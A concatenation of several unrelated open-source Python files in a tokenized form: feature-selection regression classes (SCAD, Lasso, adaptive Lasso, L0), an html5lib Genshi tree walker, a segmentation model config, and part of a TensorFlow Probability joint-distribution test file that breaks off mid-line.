coefficients Returns: penalty value """<line_sep><return>0.0<block_end><block_end><class_stmt>SCAD(PenalizedLeastSquares)<block_start>""" Smoothly clipped absolute deviation (SCAD), equation 12 and 13 in https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf """<def_stmt>__init__ self lambd:Union[float np.ndarray] a:float=3.7 **kwargs<block_start>""" Smoothly clipped absolute deviation. Args: lambd (float or list of floats): The weights for the penalty a (float): hyperparameter in SCAD penalty """<line_sep>self.lambd=lambd<line_sep>self.a=a<line_sep>super().__init__(**kwargs)<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the SCAD penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep>beta_abs=np.abs(beta)<line_sep>penalty=(self.lambd<times>beta_abs<times>(beta_abs<le>self.lambd)+-(beta_abs<power>2-2<times>self.a<times>self.lambd<times>beta_abs+self.lambd<power>2)/(2<times>(self.a-1))<times>(beta_abs<g>self.lambd)<times>(beta_abs<le>self.a<times>self.lambd)+(self.a+1)<times>self.lambd<power>2/2.0<times>(beta_abs<g>self.a<times>self.lambd))<line_sep><return>np.sum(penalty).item()<block_end><def_stmt>_penalty_jac self x y beta<block_start>beta=np.abs(beta)<line_sep>z=self.a<times>self.lambd-beta<line_sep>z[z<l>0]=0<line_sep><return>self.lambd<times>(beta<le>self.lambd+z/((self.a-1)<times>self.lambd)<times>(beta<g>self.lambd))<block_end><block_end><class_stmt>Lasso(PenalizedLeastSquares)<block_start>""" Simple Lasso regression """<def_stmt>__init__ self lambd **kwargs<block_start>""" Lasso regression with lambda * norm_1(beta) as penalty Args: lambd (float): weights for the penalty **kwargs: """<line_sep>self.lambd=lambd<line_sep>super().__init__(**kwargs)<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep>beta_abs=np.abs(beta)<line_sep><return>np.sum(self.lambd<times>beta_abs).item()<block_end><def_stmt>_penalty_jac self x y beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.2]=1<line_sep><return>self.lambd<times>sign<block_end><block_end><class_stmt>AdaptiveLasso(PenalizedLeastSquares)<block_start>""" Adaptive lasso regression using OLS coefficients as the root-n estimator coefficients """<def_stmt>__init__ self lambd gamma **kwargs<block_start>""" Adaptive lasso regression Args: lambd (float or list of floats): gamma (float): exponential for hat(beta) **kwargs: """<line_sep>self.lambd=lambd<line_sep>self.gamma=gamma<line_sep>self.w=1<line_sep>super().__init__(**kwargs)<block_end><def_stmt>select self x y options=<none><arrow>Optional[np.ndarray]<block_start>""" Select feature indices from x Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets options (dict): options in the optimizations provided to scipy.optimize.minimize Returns: list of int indices """<line_sep>self.w=self.get_w(x y)<line_sep><return>super().select(x y options)<block_end><def_stmt>get_w self x y<arrow>np.ndarray<block_start>""" Get adaptive weights from data Args: x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: coefficients array """<line_sep>beta_hat=lstsq(x y)[0]<line_sep>w=1.0/np.abs(beta_hat)<power>self.gamma<line_sep><return>w<block_end><def_stmt>penalty self beta:np.ndarray x:Optional[np.ndarray]=<none> y:Optional[np.ndarray]=<none><arrow>float<block_start>""" Calculate the penalty from input x, output y and coefficient beta Args: beta (np.ndarray): N coefficients x (np.ndarray): MxN input data array y (np.ndarray): M output targets Returns: penalty value """<line_sep><return>np.sum(self.lambd<times>self.w<times>np.abs(beta)).item()<block_end><def_stmt>_penalty_jac self x y beta<block_start>sign=np.sign(beta)<line_sep>sign[np.abs(sign)<l>0.2]=1<line_sep><return>self.lambd<times>self.w<times>sign<block_end><block_end><class_stmt>L0BrutalForce(BaseSelector)<block_start>""" Brutal force combinatorial screening of features. This method takes all possible combinations of features and optimize the following loss function 1/2 * mean((y-x @ beta)**2) + lambd * |beta|_0 """<def_stmt>__init__ self lambd:float **kwargs<block_start>""" Initialization of L0 optimization Args: lambd (float): penalty term **kwargs: """<line_sep>self.lambd=lambd<line_sep>super().__init__(**kwargs)<block_end><def_stmt>select self x:np.ndarray y:np.ndarray options:Optional[Dict]=<none> n_job:int=1<arrow>Optional[np.ndarray]<block_start>""" L0 combinatorial optimization Args: x (np.ndarray): design matrix y (np.ndarray): target vector options: n_job (int): number of cpu Returns: """<line_sep>n,p=x.shape<line_sep>index_array=list(range(p))<def_stmt>_lstsq c<block_start>x_comb=x[: c]<line_sep>beta=lstsq(x_comb y)[0]<line_sep>res=1.0/2<times>np.mean((x_comb.dot(beta)-y)<power>2)<line_sep>penalty=self.lambd<times>len(c)<line_sep>res<augadd>penalty<line_sep><return>res<block_end>indices=[]<for_stmt>p_temp range(1 p+1)<block_start><for_stmt>comb combinations(index_array p_temp)<block_start>indices.append(comb)<block_end><block_end>loss=Parallel(n_jobs=n_job)(delayed(_lstsq)(comb)<for>comb indices)<line_sep>argmin=np.argmin(loss)<line_sep>self.indices=np.array(indices[argmin])<line_sep>x_temp=x[: self.indices]<line_sep>self.coef_=np.zeros_like(x[0 :])<line_sep>self.coef_[self.indices]=lstsq(x_temp y)[0]# type: ignore <return>self.indices<block_end><block_end>
<import_from_future_stmt> absolute_import division unicode_literals<import_from_stmt>genshi.core QName<import_from_stmt>genshi.core START END XML_NAMESPACE DOCTYPE TEXT<import_from_stmt>genshi.core START_NS END_NS START_CDATA END_CDATA PI COMMENT<import_from_stmt>. base<import_from_stmt>..constants voidElements namespaces<class_stmt>TreeWalker(base.TreeWalker)<block_start><def_stmt>__iter__ self# Buffer the events so we can pass in the following one <block_start>previous=<none><for_stmt>event self.tree<block_start><if_stmt>previous<is><not><none><block_start><for_stmt>token self.tokens(previous event)<block_start><yield>token<block_end><block_end>previous=event<block_end># Don't forget the final event! <if_stmt>previous<is><not><none><block_start><for_stmt>token self.tokens(previous <none>)<block_start><yield>token<block_end><block_end><block_end><def_stmt>tokens self event next<block_start>kind,data,_=event<if_stmt>kind<eq>START<block_start>tag,attribs=data<line_sep>name=tag.localname<line_sep>namespace=tag.namespace<line_sep>converted_attribs={}<for_stmt>k,v attribs<block_start><if_stmt>isinstance(k QName)<block_start>converted_attribs[(k.namespace k.localname)]=v<block_end><else_stmt><block_start>converted_attribs[(<none> k)]=v<block_end><block_end><if_stmt>namespace<eq>namespaces["html"]<and>name<in>voidElements<block_start><for_stmt>token self.emptyTag(namespace name converted_attribs <not>next<or>next[0]<ne>END<or>next[1]<ne>tag)<block_start><yield>token<block_end><block_end><else_stmt><block_start><yield>self.startTag(namespace name converted_attribs)<block_end><block_end><elif_stmt>kind<eq>END<block_start>name=data.localname<line_sep>namespace=data.namespace<if_stmt>namespace<ne>namespaces["html"]<or>name<not><in>voidElements<block_start><yield>self.endTag(namespace name)<block_end><block_end><elif_stmt>kind<eq>COMMENT<block_start><yield>self.comment(data)<block_end><elif_stmt>kind<eq>TEXT<block_start><for_stmt>token self.text(data)<block_start><yield>token<block_end><block_end><elif_stmt>kind<eq>DOCTYPE<block_start><yield>self.doctype(*data)<block_end><elif_stmt>kind<in>(XML_NAMESPACE DOCTYPE START_NS END_NS START_CDATA END_CDATA PI)<block_start><pass><block_end><else_stmt><block_start><yield>self.unknown(kind)<block_end><block_end><block_end>
_base_=['../_base_/models/fcn_r50-d8.py' '../_base_/datasets/pascal_context.py' '../_base_/default_runtime.py' '../_base_/schedules/schedule_40k.py']<line_sep>model=dict(decode_head=dict(num_classes=60) auxiliary_head=dict(num_classes=60) test_cfg=dict(mode='slide' crop_size=(480 480) stride=(320 320)))<line_sep>optimizer=dict(type='SGD' lr=0.004 momentum=0.9 weight_decay=0.0001)<line_sep>
# Copyright 2018 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Tests for the JointDistributionAutoBatched."""<import_stmt>collections<import_stmt>os<line_sep># Dependency imports <import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_stmt>tensorflow.compat.v1<as>tf1<import_stmt>tensorflow.compat.v2<as>tf<import_stmt>tensorflow_probability<as>tfp<import_from_stmt>tensorflow_probability.python.internal test_util<line_sep>tfb=tfp.bijectors<line_sep>tfd=tfp.distributions<line_sep>JAX_MODE=<false><line_sep>Root=tfd.JointDistributionCoroutineAutoBatched.Root<line_sep>@test_util.test_all_tf_execution_regimes<class_stmt>JointDistributionAutoBatchedTest(test_util.TestCase)<block_start>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_batch_and_event_shape_with_plate self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. 1.)<line_sep>df=<yield>tfd.Exponential(1.)<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. 1.) tfd.Exponential(1.) <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20) <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' tfd.LogNormal(0. 1.)) ('df' tfd.Exponential(1.)) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep># Properties `event_shape` and `batch_shape` should be defined # even before any sampling calls have occurred. self.assertAllEqual(joint._model_flatten(joint.event_shape) [[] [] [20] [20]])<line_sep>self.assertAllEqual(joint.batch_shape [])<line_sep>is_scalar=joint._model_flatten(joint.is_scalar_event())<line_sep>self.assertAllEqual(is_scalar[0] <true>)<line_sep>self.assertAllEqual(is_scalar[1] <true>)<line_sep>self.assertAllEqual(is_scalar[2] <false>)<line_sep>self.assertAllEqual(is_scalar[3] <false>)<line_sep>event_shape=joint._model_flatten(joint.event_shape_tensor())<line_sep>self.assertAllEqual(event_shape[0] [])<line_sep>self.assertAllEqual(event_shape[1] [])<line_sep>self.assertAllEqual(event_shape[2] [20])<line_sep>self.assertAllEqual(event_shape[3] [20])<line_sep>self.assertEqual(joint.is_scalar_batch() <true>)<line_sep>batch_shape=joint.batch_shape_tensor()<line_sep>self.assertAllEqual(batch_shape [])<block_end>@parameterized.named_parameters(*(dict(# pylint: disable=g-complex-comprehension testcase_name=jd_type+'_'+sampler_type jd_class=getattr(tfd 'JointDistribution'+jd_type+'AutoBatched') sampler_type=sampler_type)<for>jd_type ('Coroutine' 'Sequential' 'Named')<for>sampler_type ('stateful' 'stateless')))<def_stmt>test_model_with_nontrivial_batch_shape self jd_class sampler_type<block_start>models={}<def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. [1. 2.])<line_sep>df=<yield>tfd.Exponential([1. 2.])<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.LogNormal(0. [1. 2.]) tfd.Exponential([1. 2.]) <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20) <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' tfd.LogNormal(0. [1. 2.])) ('df' tfd.Exponential([1. 2.])) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(tf.expand_dims(df -1) loc 1))))<line_sep>joint=jd_class(models[jd_class] batch_ndims=1 validate_args=<true>)<line_sep>self.assertAllEqual(joint._model_flatten(joint.event_shape) [[] [] [20] [20]])<line_sep>self.assertAllEqual(joint.batch_shape [2])<line_sep>is_scalar=joint._model_flatten(joint.is_scalar_event())<line_sep>self.assertAllEqual(is_scalar[0] <true>)<line_sep>self.assertAllEqual(is_scalar[1] <true>)<line_sep>self.assertAllEqual(is_scalar[2] <false>)<line_sep>self.assertAllEqual(is_scalar[3] <false>)<line_sep>self.assertAllEqual(joint.is_scalar_batch() <false>)<line_sep>batch_shape=self.evaluate(joint.batch_shape_tensor())<line_sep>self.assertAllEqual(batch_shape [2])<line_sep>x=joint.sample([5] seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>lp=self.evaluate(joint.log_prob(x))<line_sep>self.assertAllEqual(lp.shape [5 2])<block_end><def_stmt>test_model_with_dynamic_batch_ndims self<block_start><if_stmt>tf.executing_eagerly()<block_start>self.skipTest('Dynamic shape.')<block_end><def_stmt>coroutine_model <block_start>g=<yield>tfd.LogNormal(0. [1. 2.])<line_sep>df=<yield>tfd.Exponential([1. 2.])<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20)<line_sep><yield>tfd.StudentT(tf.expand_dims(df -1) loc 1)<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model batch_ndims=tf1.placeholder_with_default(1 shape=[]) validate_args=<true>)<line_sep>batch_shape_tensor=self.evaluate(joint.batch_shape_tensor())<line_sep>self.assertAllEqual(batch_shape_tensor [2])<line_sep>event_shape_tensor=self.evaluate(joint.event_shape_tensor())<line_sep>self.assertAllEqual(event_shape_tensor[0] [])<line_sep>self.assertAllEqual(event_shape_tensor[1] [])<line_sep>self.assertAllEqual(event_shape_tensor[2] [20])<line_sep>self.assertAllEqual(event_shape_tensor[3] [20])<line_sep>self.assertAllEqual(joint.batch_shape tf.TensorShape(<none>))<line_sep>self.assertAllEqual(joint._model_flatten(joint.event_shape) [tf.TensorShape(<none>)]<times>4)<line_sep>x=joint.sample([5] seed=test_util.test_seed(sampler_type='stateless'))<line_sep>lp=self.evaluate(joint.log_prob(x))<line_sep>self.assertAllEqual(lp.shape [5 2])<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'base_jd_class':tfd.JointDistributionCoroutine 'jda_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'base_jd_class':tfd.JointDistributionSequential 'jda_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'base_jd_class':tfd.JointDistributionNamed 'jda_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_broadcast_ragged_batch_shape self base_jd_class jda_class<block_start>base_jd_models={}<line_sep># Writing a JDC with ragged batch shape will broadcast the first # distribution over the second. # (though note, this model breaks `log_prob` with nontrivial sample shape). <def_stmt>coroutine <block_start>x=<yield>Root(tfd.Normal(0. scale=1.))<line_sep><yield>tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 5.])<block_end>base_jd_models[tfd.JointDistributionCoroutine]=coroutine<line_sep>base_jd_models[tfd.JointDistributionSequential]=[tfd.Normal(0. scale=1.) <lambda>x:tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 5.])]<line_sep>base_jd_models[tfd.JointDistributionNamed]={'x':tfd.Normal(0. scale=1.) 'y':<lambda>x:tfd.Normal(x[<ellipsis> tf.newaxis] [1. 2. 3. 4. 5.])}<line_sep># But we can get equivalent behavior in a JDCA by expanding dims so that # the batch dimensions line up. jd_auto_models={}<def_stmt>coroutine_auto <block_start>x=<yield>tfd.Normal(0. scale=[1.])<line_sep><yield>tfd.Normal(x [1. 2. 3. 4. 5.])<block_end>jd_auto_models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_auto<line_sep>jd_auto_models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Normal(0. scale=[1.]) <lambda>x:tfd.Normal(x [1. 2. 3. 4. 5.])]<line_sep>jd_auto_models[tfd.JointDistributionNamedAutoBatched]=(collections.OrderedDict((('x' tfd.Normal(0. scale=[1.])) ('y' <lambda>x:tfd.Normal(x [1. 2. 3. 4. 5.])))))<line_sep># Writing a JD with ragged batch shape will broadcast the first # distribution over the second. # (though note, this model breaks `log_prob` with nontrivial sample shape). jd_broadcasting=base_jd_class(base_jd_models[base_jd_class])<line_sep># This model's broadcasting behavior is a footgun (it can break inference # routines and cause silently incorrect optimization); it should be # disallowed by `validate_args`. <with_stmt>self.assertRaisesRegexp(Exception ('Component batch shapes are inconsistent|'<concat>'Broadcasting probably indicates an error in model specification'))<block_start>jda_invalid=jda_class(jd_auto_models[jda_class] batch_ndims=1 validate_args=<true>)<line_sep>_=self.evaluate(jda_invalid.log_prob(jda_invalid.sample(seed=test_util.test_seed())))<block_end># But, if the user wants to run with no guardrails, one can eke out # performance wins when evaluating a shared value over multiple models. jda_broadcasting=jda_class(jd_auto_models[jda_class] batch_ndims=1)<line_sep>self.assertAllEqual(jda_broadcasting._model_flatten(jda_broadcasting.event_shape) [[] []])<line_sep>self.assertAllEqual(jda_broadcasting.batch_shape [5])<line_sep>joint_sample=jda_broadcasting.sample(seed=test_util.test_seed())<line_sep>x_sample,y_sample=self.evaluate(list(joint_sample.values())<if>hasattr(joint_sample 'values')<else>joint_sample)<line_sep># The model samples only a single value for x, shared across the batch. self.assertAllEqual(x_sample.shape [1])<line_sep>self.assertAllEqual(y_sample.shape [5])<line_sep>lp_jd_broadcast=self.evaluate(jd_broadcasting.log_prob(jd_broadcasting._model_unflatten([x_sample[<ellipsis> 0] y_sample])))<line_sep>lp_jda_broadcast=self.evaluate(jda_broadcasting.log_prob(jda_broadcasting._model_unflatten([x_sample y_sample])))<line_sep>self.assertAllEqual(lp_jda_broadcast.shape [5])<line_sep>self.assertAllEqual(lp_jd_broadcast lp_jda_broadcast)<line_sep># Try drawing multiple samples and computing log-prob. joint_sample=self.evaluate(jda_broadcasting.sample([2 3] seed=test_util.test_seed()))<line_sep>lp_jda_broadcast=self.evaluate(jda_broadcasting.log_prob(joint_sample))<line_sep>self.assertAllEqual(lp_jda_broadcast.shape [2 3 5])<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_log_prob_and_prob_with_plate self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>a=<yield>tfd.Bernoulli(probs=0.5 dtype=tf.float32)<line_sep>b=<yield>tfd.Sample(tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32) 2)<line_sep><yield>tfd.Normal(loc=a scale=1.+b)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Bernoulli(probs=0.5 dtype=tf.float32) <lambda>a:tfd.Sample(tfd.Bernoulli(# pylint: disable=g-long-lambda probs=0.25+0.5<times>a dtype=tf.float32) 2) <lambda>b a:tfd.Normal(loc=a scale=1.+b)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('a' tfd.Bernoulli(probs=0.5 dtype=tf.float32)) ('b' <lambda>a:tfd.Sample(tfd.Bernoulli(# pylint: disable=g-long-lambda probs=0.25+0.5<times>a dtype=tf.float32) 2)) ('c' <lambda>b a:tfd.Normal(loc=a scale=1.+b))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>z=self.evaluate(joint.sample(seed=test_util.test_seed()))<line_sep>a,b,c=z.values()<if>hasattr(z 'values')<else>z<line_sep>log_prob=self.evaluate(joint.log_prob(z))<line_sep>prob=self.evaluate(joint.prob(z))<line_sep>expected_log_prob=self.evaluate(np.log(0.5)+tf.reduce_sum(tf.math.log(b<times>(0.25+0.5<times>a)+(1-b)<times>(0.75-0.5<times>a)))+tf.reduce_sum(-0.5<times>((c-a)/(1.+b))<power>2-0.5<times>np.log(2.<times>np.pi)-tf.math.log((1.+b))))<line_sep>self.assertAllClose(log_prob expected_log_prob)<line_sep>self.assertAllClose(prob np.exp(expected_log_prob))<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_log_prob_multiple_samples self jd_class<block_start>models={}<def_stmt>coroutine_model <block_start>a=<yield>tfd.Bernoulli(probs=0.5 dtype=tf.float32)<line_sep>b=<yield>tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32)<line_sep><yield>tfd.Normal(loc=a scale=1.+b)<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[tfd.Bernoulli(probs=0.5 dtype=tf.float32) <lambda>a:tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32) <lambda>b a:tfd.Normal(loc=a scale=1.+b)]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('a' tfd.Bernoulli(probs=0.5 dtype=tf.float32)) ('b' <lambda>a:tfd.Bernoulli(probs=0.25+0.5<times>a dtype=tf.float32)) ('c' <lambda>b a:tfd.Normal(loc=a scale=1.+b))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>z=joint.sample(4 seed=test_util.test_seed())<line_sep>log_prob=joint.log_prob(z)<line_sep>a,b,c=z.values()<if>hasattr(z 'values')<else>z# pylint: disable=unbalanced-tuple-unpacking expected_log_prob=(np.log(0.5)+tf.math.log(b<times>(0.25+0.5<times>a)+(1-b)<times>(0.75-0.5<times>a))+-0.5<times>((c-a)/(1.+b))<power>2-0.5<times>np.log(2.<times>np.pi)-tf.math.log((1.+b)))<line_sep>self.assertAllClose(*self.evaluate([log_prob expected_log_prob]))<block_end>@parameterized.named_parameters({'testcase_name':'coroutine' 'jd_class':tfd.JointDistributionCoroutineAutoBatched} {'testcase_name':'sequential' 'jd_class':tfd.JointDistributionSequentialAutoBatched} {'testcase_name':'named' 'jd_class':tfd.JointDistributionNamedAutoBatched})<def_stmt>test_sample_and_log_prob self jd_class# Define a bijector to detect if/when `inverse` is called. <block_start>inverted_values=[]<class_stmt>InverseTracingExp(tfb.Exp)<block_start><def_stmt>_inverse self y<block_start>inverted_values.append(y)<line_sep><return>tf.math.log(y)<block_end><block_end>models={}<def_stmt>coroutine_model <block_start>g=<yield>InverseTracingExp()(tfd.Normal(0. 1.) name='g')<line_sep>df=<yield>tfd.Exponential(1. name='df')<line_sep>loc=<yield>tfd.Sample(tfd.Normal(0 g) 20 name='loc')<line_sep><yield>tfd.StudentT(df loc 1 name='x')<block_end>models[tfd.JointDistributionCoroutineAutoBatched]=coroutine_model<line_sep>models[tfd.JointDistributionSequentialAutoBatched]=[InverseTracingExp()(tfd.Normal(0. 1.) name='g') tfd.Exponential(1. name='df') <lambda>_ g:tfd.Sample(tfd.Normal(0 g) 20 name='loc') <lambda>loc df:tfd.StudentT(df loc 1 name='x')]<line_sep>models[tfd.JointDistributionNamedAutoBatched]=collections.OrderedDict((('g' InverseTracingExp()(tfd.Normal(0. 1.))) ('df' tfd.Exponential(1.)) ('loc' <lambda>g:tfd.Sample(tfd.Normal(0 g) 20)) ('x' <lambda>loc df:tfd.StudentT(df loc 1))))<line_sep>joint=jd_class(models[jd_class] validate_args=<true>)<line_sep>seed=test_util.test_seed(sampler_type='stateless')<for_stmt>sample_shape ([] [5])<block_start>inverted_values.clear()<line_sep>x1,lp1=self.evaluate(joint.experimental_sample_and_log_prob(sample_shape seed=seed df=2.7))<line_sep># Check that kwargs are supported. x2=self.evaluate(joint.sample(sample_shape seed=seed df=2.7))<line_sep>self.assertAllCloseNested(x1 x2)<line_sep>self.assertLen(inverted_values 0)<line_sep>lp2=joint.log_prob(x1)<line_sep>self.assertLen(inverted_values 1)<line_sep>self.assertAllClose(lp1 lp2)<block_end><block_end>@test_util.jax_disable_test_missing_functionality('b/157594634')<def_stmt>test_sample_distributions self<block_start><def_stmt>coroutine_model <block_start>g=<yield>tfd.Normal(0. 1. name='g')<line_sep>df=<yield>tfd.Exponential(1. name='df')<line_sep>loc=<yield>tfd.Normal(tf.zeros([20]) g name='loc')<line_sep><yield>tfd.StudentT(df loc 1 name='x')<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model)<line_sep>ds,xs=joint.sample_distributions([4 3] seed=test_util.test_seed())<for_stmt>d,x zip(ds xs)<block_start>self.assertGreaterEqual(len(d.batch_shape) 2)<line_sep>lp=d.log_prob(x)<line_sep>self.assertAllEqual(lp.shape[:2] [4 3])<block_end><block_end>@test_util.jax_disable_test_missing_functionality('b/201586404')<def_stmt>test_sample_distributions_not_composite_tensor_raises_error self<block_start><def_stmt>coroutine_model <block_start><yield>tfd.TransformedDistribution(tfd.Normal(0. 1.) tfb.Exp() name='td')<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(coroutine_model)<line_sep># Sampling with trivial sample shape avoids the vmap codepath. ds,_=joint.sample_distributions([] seed=test_util.test_seed())<line_sep>self.assertIsInstance(ds[0] tfd.TransformedDistribution)<with_stmt>self.assertRaisesRegex(TypeError r'Some component distribution\(s\) cannot be returned')<block_start>joint.sample_distributions([4 3] seed=test_util.test_seed())<block_end><block_end><def_stmt>test_sample_with_batch_value self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0 1.) 2)<line_sep>b=<yield>tfd.Sample(tfd.Normal(0 1.) 3)<line_sep># The following line fails if not autovectorized. <yield>tfd.Normal(a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1.)<block_end>x=self.evaluate(dist.sample(123 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(value=x seed=test_util.test_seed()))<line_sep>self.assertAllCloseNested(x x2)<line_sep># Also test a dict-type value (JDNamed). dist=tfd.JointDistributionNamedAutoBatched({'a':tfd.Sample(tfd.Normal(0 1.) 2) 'b':tfd.Sample(tfd.Normal(0 1.) 3) 'c':<lambda>a b:tfd.Normal(# pylint: disable=g-long-lambda a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1.)})<line_sep>x=self.evaluate(dist.sample(123 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(value=x seed=test_util.test_seed()))<line_sep>self.assertAllCloseNested(x x2)<block_end><def_stmt>test_sample_with_value_as_kwarg self<block_start>@tfd.JointDistributionCoroutineAutoBatched<def_stmt>dist <block_start>a=<yield>tfd.Sample(tfd.Normal(0 1.) 2 name='a')<line_sep>b=<yield>tfd.Sample(tfd.Normal(0 1.) 3 name='b')<line_sep># The following line fails if not autovectorized. <yield>tfd.Normal(a[tf.newaxis <ellipsis>]<times>b[<ellipsis> tf.newaxis] 1. name='c')<block_end>x=self.evaluate(dist.sample(4 seed=test_util.test_seed()))<line_sep>x2=self.evaluate(dist.sample(seed=test_util.test_seed() a=x.a))<line_sep>self.assertAllClose(x.a x2.a)<line_sep>self.assertAllEqual(x2.b.shape [4 3])<line_sep>self.assertAllEqual(x2.c.shape [4 3 2])<block_end>@parameterized.named_parameters(dict(testcase_name='stateful' sampler_type='stateful') dict(testcase_name='stateless' sampler_type='stateless'))<def_stmt>test_sample_with_partially_specified_value self sampler_type<block_start>num_features=5<def_stmt>dist <block_start>scale_variance=<yield>tfd.InverseGamma(0.5 0.5)<line_sep>scale_noncentered=<yield>tfd.Sample(tfd.HalfNormal(1.) num_features)<line_sep>scale=scale_noncentered<times>scale_variance[<ellipsis> <none>]<power>0.5<line_sep>weights_noncentered=<yield>tfd.Sample(tfd.Normal(0. 1.) num_features)<line_sep><yield>tfd.Deterministic(weights_noncentered<times>scale)<block_end>joint=tfd.JointDistributionCoroutineAutoBatched(dist validate_args=<true>)<line_sep>value_partial_batch_dim=4<line_sep>value_=(3. <none> <none> np.ones([value_partial_batch_dim num_features]))<line_sep>value=[<none><if>v<is><none><else>tf.cast(v tf.float32)<for>v value_]<line_sep># The sample should keep the specified values. xs=self.evaluate(joint.sample(value=value seed=test_util.test_seed(sampler_type=sampler_type)))<line_sep>self.assertAllEqual(xs[0] tf.fill([value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape [value_partial_batch_dim num_features])<line_sep>self.assertAllEqual(xs[2].shape [value_partial_batch_dim num_features])<line_sep>self.assertAllEqual(xs[3] value[3])<line_sep># With sample shape. sample_shape=[6 2]<line_sep>samples=joint.sample(sample_shape value=value seed=test_util.test_seed(sampler_type=sampler_type))<line_sep>xs=self.evaluate(samples)<line_sep>expect_shp=sample_shape+[value_partial_batch_dim num_features]<line_sep>self.assertAllEqual(xs[0] tf.fill(sample_shape+[value_partial_batch_dim] value[0]))<line_sep>self.assertAllEqual(xs[1].shape expect_shp)<line_sep>self.assertAllEqual(xs[2].shape expect_shp)<line_sep>self.assertAllEqual(xs[3] 